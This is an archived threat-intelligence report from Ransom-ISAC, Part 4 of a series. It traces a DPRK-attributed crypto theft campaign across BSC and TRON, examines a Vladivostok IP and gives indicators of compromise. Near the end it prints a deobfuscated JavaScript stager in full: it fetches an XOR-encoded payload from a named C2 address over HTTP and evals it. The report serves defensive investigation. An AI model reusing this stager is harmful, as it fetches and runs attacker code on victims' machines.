{
	"id": "647480f0-ef77-4935-90b8-82b06b685882",
	"created_at": "2026-04-06T00:12:44.534205Z",
	"updated_at": "2026-04-10T03:28:28.705932Z",
	"deleted_at": null,
	"sha1_hash": "4f2c964fbf2a5f804e62160d1c3d587d4aab7ad2",
	"title": "Cross-Chain TxDataHiding Crypto Heist: A Very (Very) Chainful Process (Part 4)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2391248,
	"plain_text": "Cross-Chain TxDataHiding Crypto Heist: A Very (Very) Chainful Process (Part 4)\r\nBy Ransom-ISAC\r\nPublished: 2025-12-08 · Archived: 2026-04-02 12:47:41 UTC\r\nExecutive Summary\r\nIn September 2025, Ransom-ISAC was brought in by Crystal Intelligence to investigate a cryptocurrency and data theft attempt via a private weaponised GitHub repository. What initially appeared to be a standard phishing campaign quickly evolved into something far more sophisticated—a multi-layered attack leveraging novel blockchain-based command-and-control infrastructure and cross-platform malware designed to compromise development environments at scale.\r\nPart 1 of this series delves into the sophisticated nature of a potentially attributed DPRK campaign in which novel tradecraft, such as Cross-Chain TxDataHiding techniques, was combined with the subsequent creation of takedown-proof command and control (C2) infrastructure. Part 2 continues with a holistic analysis of the core malicious payloads, with a complete view into the entire kill chain.\r\nPart 3 focuses on analysing the threat actor's operational infrastructure to support attribution efforts. Through collaboration with Bridewell, the research uses infrastructure fingerprinting and open-source intelligence to identify related threat clusters and potentially connected campaigns.\r\nPart 4 follows the money through on-chain analysis, tracing stolen funds across the BSC and TRON blockchains and connecting wallet addresses directly to other DPRK exchange thefts. 
Produced in collaboration with Crystal Intelligence, this piece reveals centralised exchange interactions, swap transactions linked to Russian IP addresses, and the multi-chain laundering techniques used to move funds—providing blockchain forensic evidence that ties this campaign to a broader pattern of North Korean cryptocurrency operations.\r\nShould you have any information that can potentially support or refute our analysis, please feel free to reach out to us at Ransom-ISAC. Where assumptions or estimates are made to fill gaps in our analysis, they have been stated clearly so that the reader is aware.\r\nInfrastructure Analysis\r\nFollowing the analysis and discovery of blockchain activity, and using the addresses as on-chain start points, we decided to examine the transaction relationships.\r\nCrystal Expert Users can view the graphs associated with this case here.\r\nFrom the previous investigation, we began with the following TRON network start points: TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP and TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG.\r\nBoth addresses were funded by a common source for fees, TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy. Examination of this fee-paying address identified a third address, TLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe, that also contained a significant number of pointers to transactions on BSC. A review of all these transactions identified 52 pointers on other chains (see IoCs).\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 1 of 15\n\nCrystal Intelligence Platform - Tracking TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy\r\nCrystal Intelligence Platform\r\nOf these, all related to a single address, 0x9bc1355344b54dedf3e44296916ed15653844509. 
This address also deployed a token contract, BOT250205, at 0x8eac3198dd72f3e07108c4c7cff43108ad48a71c.\r\nBOT250205\r\nA peculiar token: there are only four holders, including the 0x9bc1355344b54dedf3e44296916ed15653844509 address. The other three are:\r\n0x2CEe09458B7Ed8F2ED54502DbEd908E83cA78A77\r\n0x3aCa68A063f9ab2CFcc9732554190199F9b09f7B\r\n0x0003D4eD8e99F2517Eb4Cb14CFbbc115cFc0208b\r\nExamination of the transactions by these addresses revealed additional messages encoded on-chain. These could not be de-obfuscated successfully at the time of writing.\r\nThe contract itself does not appear to be much other than an additional input field, 'transaction text'. There have only been 23 transactions involving the contract since its deployment in early 2025.\r\nOf note, the 0x9 address was funded by 0xb351954037bd1c38d7677db7fe429706c7b016da; this same address bridged funds using Allbridge to TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy, which served as the source of fees for the initial pointer addresses.\r\nA Cold Case?\r\nInvestigating the source of funds for 0xC613B8f9824E6Dc7520F5f1027f4818FC64D8490, which itself acted as the source of funds for the entire project, revealed even more complexity; funds at this address were raised on the Aurora chain through several bridges between Aurora, Ethereum and then BSC. Ultimately these funds were traced to a centralised exchange, though notably the transaction was from as far back as 2021.\r\nThis pattern was common in many of the infrastructure transfers: addresses lay dormant for long periods and were later operationalised for infrastructure use. 
In most cases they received funds from centralised exchange sources.\r\nCrystal Intelligence Platform - 0xC613B8f9824E6Dc7520F5f1027f4818FC64D8490\r\nShow Me The Money\r\nTypically in blockchain investigations, cases involve trying to identify payment relationships between addresses. This may be useful for attribution of a threat actor, as well as identification of common source and destination services.\r\nIn this case, our first step was to consider the TRX (the native token of the TRON network, used to pay transaction fees) obtained by TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy, which in turn funded the TRX malware pointer addresses. TRX was sourced from two locations: a popular instant swap service and a cross-chain bridge.\r\nTemporal analysis of these pointer address transactions showed that the majority of this activity began in early June 2025 during weekdays, suggesting operations during a standard working week.\r\nTemporal Analysis of payment addresses\r\nIt was also noticeable that the TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy address received 1,012 USDT from an instant swap service. This may have been intended as pre-staged funds to allow it to be self-sustaining and purchase TRX for transaction activity; however, the funds moved almost immediately to BSC using the cross-chain bridging service Allbridge at 0xab57bf80d77bf250331f9e1a523b2c11485a1a64 on BSC.\r\nInterestingly, the original TRX transaction by TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP (3fa56cbb32712d3a0aff2daf79737616832b860b18b77755755ad79b35e94436) with the message 'Mxy Custom Memo Text' points to a likely self-custodial address, THK2LfzQ7FFgheR33fQcmBnPVnGKQNuetU. 
The counterparties of this address include known hubs for DPRK-related funds, including Huione, Xinbi Guarantee and BlackU.\r\nMultiple chains and bridges were used by this group, including Aptos, Allbridge, Stargate and Bridgers, to name but a few. Notably absent was the use of mixing or other purpose-built obfuscation services.\r\nThe 0xab57bf80d77bf250331f9e1a523b2c11485a1a64 wallet had significant activity, receiving over 25,000 USDT between Oct 2024 and Apr 2025. Tracing forwards from this address showed similar bridging activity, eventually with exposure to several addresses identified in connection with North Korean thefts.\r\nRussian IP Overlap\r\nAccording to collateral sources, one of the wallets was accessed via IP address 188.43.33[.]249.\r\nWhilst TrendMicro reported in April 2025 on possible shared overlap, there have been very few other public reports of such usage.\r\nPerforming a lookup of the IP address in question indicates the owner as TRANSTELECOM, or TTK, based in Russia:\r\nThe presence of a DPRK-linked IP address geolocating to Vladivostok is consistent with North Korea's known internet infrastructure arrangements with Russia. According to a 2019 NATO CCDCOE paper on North Korean cyber operations, TransTeleCom (TTK), one of Russia's largest telecommunications companies, began providing internet service to North Korea in October 2017 via a fiber-optic cable linking Vladivostok to the North Korean border.\r\nThis connection was established after North Korea's network experienced disruptions, including a nine-hour outage following an ICBM launch in July 2017, prompting Pyongyang to diversify its internet access beyond its existing China Unicom link. Given this infrastructure runs through Vladivostok, DPRK-associated traffic routing through or appearing to originate from that location is expected. 
Note the proximity in the below image of Vladivostok to Pyongyang:\r\nSource: TTK website\r\nThe paper also highlights that North Korea deliberately conducts cyber operations from third-party countries to obscure attribution and complicate any response. North Korean cyber units, particularly Unit 180, which specialises in financial operations, typically operate overseas to mask the link between their activities and Pyongyang.\r\nResearchers at Recorded Future identified North Korean cyber operatives maintaining a physical presence across multiple countries including China, India, Malaysia, and others. Given the TTK infrastructure passes through Russian territory and the close diplomatic and economic ties between the DPRK and Russia—including arrangements that facilitate North Korean workers and personnel in Russian border regions—observing DPRK-associated network activity in Vladivostok would not be unusual.\r\nThe geolocation of the 33.249 IP address is also very interesting, resolving to Vladivostok, Primorye, RU (43.1153° N, 131.9090° E).\r\nThis leads to a building conveniently adjacent to the former Consulate General of the United States on Google Maps.\r\nSource: Google Maps\r\nNote: this was formerly the US Consulate in Vladivostok; it has since closed down and was turned into the Uzbekistan Consulate. More information can be found here: https://embassies.info/ConsulateofUzbekistaninVladivostokRussia.\r\nLocation of IP address, Present Uzbek Embassy Building (Source: Yandex Maps)\r\nA New Numbers Station? Strange TxDataHiding\r\nDuring the review of transaction messages, several unusual artefacts emerged that had been embedded on chain. The purpose of these artefacts is not known; however, they may have been used for testing purposes. 
It may also be a primitive form of misdirection, or even an unknown Capture the Flag (CTF) using the same infrastructure as the threat actor.\r\nThis was related to 0x6bEf55A0BB4bFF96f947eb1f87E9a59031BB1686, which was connected to our original 0x000000000000000000000000000000000000dEaD addresses.\r\nSimilar transactions were also observed on Polygon in more recent days, which may be indicative of testing alternative methods for delivery.\r\nCrystal Intelligence Platform\r\nUnusual Strings\r\nStrange string:\r\n\"Hello my name is Charlie\"\r\nhttps://bscscan.com/tx/0x41e594f1605522af0b91b7047255685c81c1f2fa785c3d59f76220205e2b1c59\r\nThe destination wallet, which appears to be one for this campaign, had a JPEG of a chest X-ray embedded in it:\r\nhttps://bscscan.com/tx/0x35abd696c971db5baa4db138fbd091b56a9837edf21ec5d9db9f60a21688f622\r\nA sample medical report (PDF) with synthetic data:\r\nhttps://bscscan.com/tx/0x31f7276a8b474891f0b072aba96ec456ed05e8d14d9fba6943fa532fbe4bfebf\r\nFake legal document:\r\nOther PDFs included what looks like some garbage data for a fake contract:\r\nhttps://bscscan.com/tx/0x23dcad0d020465454c91ffbdef03622411514661b89791b097f49e2363d88ada\r\nAn audio file was also found, reporting 'Stratus File Test':\r\nhttps://bscscan.com/tx/0xe2ce2c1a48f253df8605412ddc45a425d63a6d0eaa4d7f97801a08f8a58af75c\r\nA 'test gif':\r\nhttps://bscscan.com/tx/0x4d81bab4dc927a4e7ca1a576ed9f697f9d0bed9f410935189a7a8b8f6ccadf10\r\nCryptographic Keys\r\nNumerous AES-GCM algorithms:\r\nAES-GCM IP cores implement the Advanced Encryption Standard (AES) in Galois/Counter Mode (GCM). 
AES-GCM is a widely used cryptographic algorithm for Authenticated Encryption with Associated Data (AEAD) purposes, providing both data confidentiality and authenticity.\r\nIt is very likely that the threat actor is utilising this to further complicate their obfuscation techniques. Without the key and nonce it is near impossible to de-obfuscate encrypted contents.\r\nhttps://bscscan.com/tx/0x0f8211634dfd292dc5a27e3e18258c830b7eae1a12db20a172e409c2750905d7\r\nhttps://bscscan.com/tx/0xd5a9027b4878bfe0683c1232aa68931b0da1a942cfff9af282d46648fa84f1e3\r\nhttps://bscscan.com/tx/0xa5ff50df963bba22349c9bfb2d3e1165833a1c955581213c1c3942a40fb559fc\r\nhttps://bscscan.com/tx/0x8d011dbc99962ee919279702d0eab286ed08787341fcdc5342e41d3453ed0108\r\nToken Contract\r\nThe following is a sample GCM:\r\nhttps://bscscan.com/tx/0x90aa1383cb1717aaf9f3b77451b09acb017f14490a778e4d33cb0bb70a0e7df2\r\nThis is a Stratus (STRAT) ERC-20 token contract - essentially digital money on the Ethereum blockchain. When deployed, it creates a fixed supply of 100 million STRAT tokens (with 18 decimal places) and sends them all to a single wallet address. From there, people can transfer tokens to each other, check their balances, and approve other addresses (like decentralised exchanges) to spend tokens on their behalf. It also includes a \"permit\" feature that lets users approve spending via a cryptographic signature instead of an on-chain transaction, which saves gas fees. 
It's a standard, minimal token contract with no special mechanics like taxes, minting, burning, or admin controls - just basic fungible token functionality.\r\nXCTDH History\r\nBased on the BSC wallet we followed in Parts 1-3, 0x9BC1355344B54DEDf3E44296916eD15653844509, we can also perform some timeline analysis to assess that, at the very least, BSC-based Transaction Data Hiding (TxDataHiding) has existed since as early as February 7 2025, as this is the first occurrence of a transaction containing a malicious obfuscated payload:\r\n0x00296c01c443aee6712330a97e851c4a100c9764bd56426f432c2c802c7005fd\r\nInterestingly, there were also multiple transactions deliberately made not only to dead wallets (0x000000000000000000000000000000000000dEaD) but also to other wallets, likely for testing:\r\nCrystal Intelligence Platform\r\n0x8EaC3198dD72f3e07108c4C7CFf43108AD48A71c - This address is the BOT 2025 Deployer.\r\n0xF55657e8ADefaE0578D771ddb942d22A70328478 - This address, similar to others, used a number of cross-chain bridges. Though on-chain tracing found no suspicious connections, deposits from this address were made to Republic of Korea-based centralised cryptocurrency exchange services, as well as other large international services.\r\nCrystal Intelligence Platform\r\n0x37648d37BbB103e0cFD1cBe399B3f46b3E6b3a0f - Sent funds to the malware transaction address; active on multiple chains. Exposure to centralised exchanges and many DeFi services.\r\nCrystal Intelligence Platform\r\n0xB351954037Bd1c38d7677DB7FE429706c7b016dA - Sent funds via bridges to TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy, the gas funding address for the initial pointer addresses.\r\nCrystal Intelligence Platform\r\n0x3aCa68A063f9ab2CFcc9732554190199F9b09f7B - Sent funds to the BSC malware transaction address; 
received from 0xb351954037bd1c38d7677db7fe429706c7b016da.\r\nRAT Timeline\r\nUsing the same deobfuscation techniques outlined in Parts 1 and 2, timeline analysis was also performed on all transactions containing more than 10,000 characters associated with wallet 0x9BC1355344B54DEDf3E44296916eD15653844509. These were all the Remote Access Trojan (RAT) DEV#POPPER.JS variants which we found in our prior investigation. The full list of deobfuscated RAT scripts can be found in the GitHub repository for Part 4.\r\nThe cluster list:\r\nIP Address First Seen\r\n136.0.9.8 12/06/2025\r\n166.88.4.2 12/06/2025\r\n23.27.202.27 20/06/2025\r\n23.27.120.142 08/10/2025\r\n202.155.8.173 30/10/2025\r\n198.105.127.210 14/11/2025\r\n166.88.134.82 21/11/2025\r\nThe following is the timeline of occurrences from the transactions found:\r\nTemporal Analysis of DEV#POPPER.JS C2 Activity\r\nNote that the occurrences of the bottom three IP addresses 23.27.202[.]27, 166.88.4[.]2, and 136.0.9[.]8 were reduced in frequency after the XCTDH publications of Parts 1 \u0026 2.\r\nInitial Stager\r\nFurthermore, we noted that the second contract initiated, 0x07a02d3bda74523a8571482380f2c8a24cfe24db03c96714abfebad44a60c404, occurring on Feb-07-2025 04:47:45 AM UTC, was actually the first Python Downloader (Payload1_2 (HTTP Payload Stager)), which ultimately leads to downloading the OmniStealer malware as discussed in Part 2. The difference is that the IP address is slightly different and an interesting string is left behind, BEP-20: BOT250205 (BOT):\r\nC2 Stager in XCTDH Case\r\nField Value\r\nC2 IP 154.91.0[.]103\r\nC2 Port 27017 (0x6989)\r\nFull C2 URL http://154.91.0[.]103:27017/$/boot\r\nXOR Key ThZG+0jfXE6VAGOJ\r\nUser-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML; like Gecko) Chrome/131.0.0.0 Safari/537.36\r\nContract Name BEP-20: 
BOT250205 (BOT)\r\nInterestingly, the full contract stems back to the mint method of contract initiation; this is used to create the BOT250205 token, which was allocated to several of the BSC addresses used by the malware deployer.\r\nThe obfuscation used here is much simpler and seems like a prototype of the more sophisticated techniques we saw in the earlier parts of this series:\r\n// C2 base URL (see the C2 Stager table above)\r\nglobal._H = \"http://154.91.0.103:27017\";\r\n(async () =\u003e {\r\n  // XOR-decode the fetched body with the repeating 16-byte key, then eval the result\r\n  await eval(\r\n    (function (a) {\r\n      const b = \"ThZG+0jfXE6VAGOJ\";\r\n      const d = b.length;\r\n      let e = \"\";\r\n      for (let f = 0; f \u003c a.length; f++) {\r\n        const g = a.charCodeAt(f);\r\n        const h = b.charCodeAt(f % d);\r\n        e += String.fromCharCode(g ^ h);\r\n      }\r\n      return e;\r\n    })(\r\n      // Fetch /$/boot from the C2 over plain HTTP with a browser-like User-Agent\r\n      await (async function () {\r\n        return new Promise((c, d) =\u003e {\r\n          const e = new URL(global._H + \"/$/boot\");\r\n          const f = {\r\n            \"User-Agent\":\r\n              \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML; like Gecko) Chrome/131.0.0.0 Safari/537.36\",\r\n          };\r\n          const g = {\r\n            method: \"GET\",\r\n            hostname: e.hostname,\r\n            port: e.port,\r\n            path: e.pathname,\r\n            headers: f,\r\n          };\r\n          const i = require(\"http\").request(g, (j) =\u003e {\r\n            let k = \"\";\r\n            j.on(\"data\", (l) =\u003e {\r\n              k += l;\r\n            });\r\n            j.on(\"end\", () =\u003e {\r\n              c(k);\r\n            });\r\n          });\r\n          i.on(\"error\", (j) =\u003e {\r\n            d(j);\r\n          });\r\n          i.end();\r\n        });\r\n      })()\r\n    )\r\n  );\r\n})();\r\nConclusion\r\nThis case highlights the extreme complexity of modern on-chain investigations; multiple blockchains, tokens, decentralised exchanges and cross-chain bridges taxed every analyst. Coupled with this, the data embedded on chain required additional skills, not common in many investigations, to decode.\r\nThese techniques may slow an investigator, but ultimately can be unwound. 
The lack of specific obfuscation services - mixing services and privacy coins - is also significant and demonstrates a high level of confidence in cross-chain movement as an effective evasion method for deniable on-chain activity.\r\nOur interpretation of the unusual transaction payloads - images, PDF files, audio - is that they may be indicative of a test range; references to Stratus may be to Datadog's red-team application (https://github.com/DataDog/stratus-red-team), though this is a low-confidence assessment. In many areas, the more we dig, the more questions than answers this case raises.\r\nDespite these gaps in knowledge, it can be stated conclusively that this attack chain shows a high level of mastery of, and resources for, public blockchains by DPRK-related entities. And whilst this threat uses several chains for the malicious payload, conceivably it could be on almost any blockchain.\r\nRansom-ISAC's View\r\nCrypto, aged like fine wine\r\nIt was noteworthy that the infrastructure - the tokens used to fund the various transactions - had lain dormant in many cases for years. This aging process may be indicative of attempts to conceal the true nature of the address holder.\r\nFrom Russia with Malware\r\nThe identification of a Russian IP address in Vladivostok is highly significant; with warming ties between the DPRK and the Russian Government resulting from military cooperation in the latter's illegal occupation of Ukraine, it is possible DPRK-affiliated groups may have been conducting their operations from Russia - or at least, from Russian IP addresses.\r\nOverlapping payment infrastructure\r\nAnother unexpected turn in this project was the overlapping payments with known DPRK theft addresses. Typically, APT teams are understood to work in discrete groups that are disconnected from the payment infrastructure. In this case, however, funds bridged between blockchains eventually interacted with addresses related to other DPRK thefts. 
Whilst this may be construed as poor operational security, it may also represent a nonchalance towards any law enforcement consequences for their activities.\r\nFollow the Code\r\nAs a community, we need to move beyond \"follow the money\" when investigating cryptocrime. The emergence of Etherhiding, TxDataHiding, and Cross-Chain TxDataHiding—deployed alongside campaigns like Contagious Interview—demonstrates that we're still in the early stages of understanding how sophisticated these techniques will become. From here on out, \"follow the code\" is far more fitting.\r\nAcknowledgments\r\nWe extend our gratitude to all collaborators who contributed their expertise to this investigation: François-Julien Alcaraz, Nick Smart, Andrii Sovershennyi, Yashraj Solanki, Joshua Penny, Tammy Harper and Ellis Stannard. Special thanks to the Ransom-ISAC members whose collective intelligence and collaborative approach made this analysis possible.\r\nIndicators of Compromise (IOCs)\r\nNote: Due to the extensive nature of the malware IOCs (70+ entries), the complete list is available in the GitHub repository for Part 4.\r\nType | Indicator | First Seen (DD/MM/YYYY) | Notes\r\nIP login to access cryptocurrency wallet | 188.43.33[.]249 | N/A | Vladivostok-related address to TTK\r\nInitial IP from Python Downloader (Payload1_2 HTTP Payload Stager) | 154.91.0[.]103 | 07/02/2025 | Attributed to backdoor reported by MalwareHunterTeam\r\nDEV#POPPER.JS RAT IP | 136.0.9.8 | 12/06/2025 | Timeline analysis above\r\nDEV#POPPER.JS RAT IP | 166.88.4.2 | 12/06/2025 | Timeline analysis above\r\nDEV#POPPER.JS RAT IP | 23.27.202.27 | 20/06/2025 | Timeline analysis above\r\nDEV#POPPER.JS RAT IP | 23.27.120.142 | 08/10/2025 | Timeline analysis above\r\nDEV#POPPER.JS RAT IP | 202.155.8.173 | 30/10/2025 | Timeline analysis above\r\nDEV#POPPER.JS RAT IP | 198.105.127.210 | 14/11/2025 | Timeline analysis above\r\nDEV#POPPER.JS RAT IP | 166.88.134.82 | 21/11/2025 | Timeline analysis above\r\nCrypto / Blockchain IOCs\r\nKey blockchain addresses and transaction hashes identified during the investigation:\r\nType | Indicator | Notes/Message\r\nBlockchain | 0x6bEf55A0BB4bFF96f947eb1f87E9a59031BB1686 | DPRK-Linked Potential Communications Channel\r\nCross-Chain Pointer | TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP | 0xb980676a283234de8abb91a9ecfd1ca5055ab1119492f08bc31711d8ef48cb2\r\nBlockchain | TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP | Mxy custom memo text\r\nCross-Chain Pointer | TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG | 0xd33f78662df123adf2a178628980b605a0026c0d8c4f4e87e43e724cda258fef\r\nCross-Chain Pointer | TLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe | 0x197b587bc976641277791f951518667f12c93d1ace916b3fe79f84759a62f504\r\nCross-Chain Pointer | TLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe | 0xda655e6b69e98cbdda93e31804827b49410880bbb3c17b908a71efe85e284dfa\r\nCross-Chain Pointer | TLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe | 0x6c777ac28d0dba345eeda8b65625ef1aec69ecb5a489f25f2a2545cf3b3bb344\r\nCross-Chain Pointer | TLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe | 0xf0adf6867fa5e1f7f9323e992dcad37eda3ca9bff82f49729ff1b85ab84a10d9\r\nCross-Chain Pointer | TLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe | 0xc3d4740f747e2f0adf622d2ac48ef6bda4b18e3d152028f0f8027216199c4fee\r\nCross-Chain Pointer | TLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe | 0x1a4272be3c516faea9093f5c2fadadb620cfe8bfbd50e22008847e6056fd91b9\r\nNote: The complete list of 52+ cross-chain pointers and blockchain IOCs is available in the GitHub repository for Part 4.\r\nSource: https://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/"
	],
	"report_names": [
		"cross-chain-txdatahiding-crypto-heist-part-4"
	],
	"threat_actors": [
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434364,
	"ts_updated_at": 1775791708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f2c964fbf2a5f804e62160d1c3d587d4aab7ad2.pdf",
		"text": "https://archive.orkl.eu/4f2c964fbf2a5f804e62160d1c3d587d4aab7ad2.txt",
		"img": "https://archive.orkl.eu/4f2c964fbf2a5f804e62160d1c3d587d4aab7ad2.jpg"
	}
}